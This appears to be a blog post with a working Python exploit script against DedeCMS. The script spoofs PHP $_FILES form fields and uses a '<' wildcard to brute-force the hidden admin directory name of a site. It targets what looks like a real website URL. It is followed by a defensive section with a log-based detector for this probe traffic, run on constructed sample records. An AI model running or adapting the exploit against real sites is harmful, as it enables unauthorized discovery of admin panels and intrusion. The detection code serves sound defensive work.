Brute-Forcing the DEDE Admin Login Page
2024-10-14 03:52:00
#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = python3
*
*/
'''
import requests
import itertools

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.rmjdw.com/tags.php"
# Form fields named like PHP's $_FILES array; {p} is the candidate prefix.
data = {
    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]" : 0,
    "_FILES[mochazz][size]" : 0,
    "_FILES[mochazz][type]" : "image/gif"
}

# Phase 1: try prefixes of length 1 to 6 until the response changes.
for num in range(1,7):
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = requests.post(url,data=data)
        # A 200 response without the error string marks a matching prefix.
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            # Restore the template for the next candidate.
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)  # "The prefix is:"

# Phase 2: extend the prefix one character at a time (at most 30 characters).
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        # Reaching the last character without a match ends the search.
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("后台地址为:",back_dir)  # "The admin directory is:"
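For defenders, the traffic this script produces is distinctive: repeated form-encoded POSTs to tags.php whose field names imitate PHP's $_FILES array and whose tmp_name value contains "<". The detector below is an added example, not part of the original post. It assumes a request logger that records POST bodies as (client_ip, method, path, body) tuples; the record layout, the threshold and the sample records are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlencode

# Field names shaped like the ones the script above submits as ordinary form data.
FILES_KEY = re.compile(r"^_FILES\[[^\]]*\]\[(tmp_name|name|size|type)\]$")
THRESHOLD = 3  # assumed: probe requests per client before it is reported

def is_probe(method, path, body):
    """True if a POST to tags.php carries a spoofed _FILES[...][tmp_name] containing '<'."""
    if method != "POST" or not path.split("?")[0].endswith("/tags.php"):
        return False
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = FILES_KEY.match(key)
        if m and m.group(1) == "tmp_name" and "<" in value:
            return True
    return False

def noisy_clients(records, threshold=THRESHOLD):
    """Return the sorted client IPs that sent at least `threshold` probe requests."""
    hits = Counter(ip for ip, method, path, body in records
                   if is_probe(method, path, body))
    return sorted(ip for ip, count in hits.items() if count >= threshold)

def probe_body(prefix):
    """Build a constructed request body with the same fields as the script above."""
    return urlencode({
        "_FILES[mochazz][tmp_name]": "./%s<</images/adminico.gif" % prefix,
        "_FILES[mochazz][name]": 0,
        "_FILES[mochazz][size]": 0,
        "_FILES[mochazz][type]": "image/gif",
    })

# Constructed sample records (documentation IP ranges), not real traffic.
SAMPLE = [
    ("192.0.2.10", "POST", "/tags.php", probe_body("a")),
    ("192.0.2.10", "POST", "/tags.php", probe_body("b")),
    ("192.0.2.10", "POST", "/tags.php", probe_body("c")),
    ("198.51.100.7", "POST", "/tags.php", "tag=linux"),
    ("198.51.100.7", "GET", "/tags.php?/linux/", ""),
    ("203.0.113.5", "POST", "/tags.php", probe_body("x")),  # single hit, below threshold
]

if __name__ == "__main__":
    print(noisy_clients(SAMPLE))
```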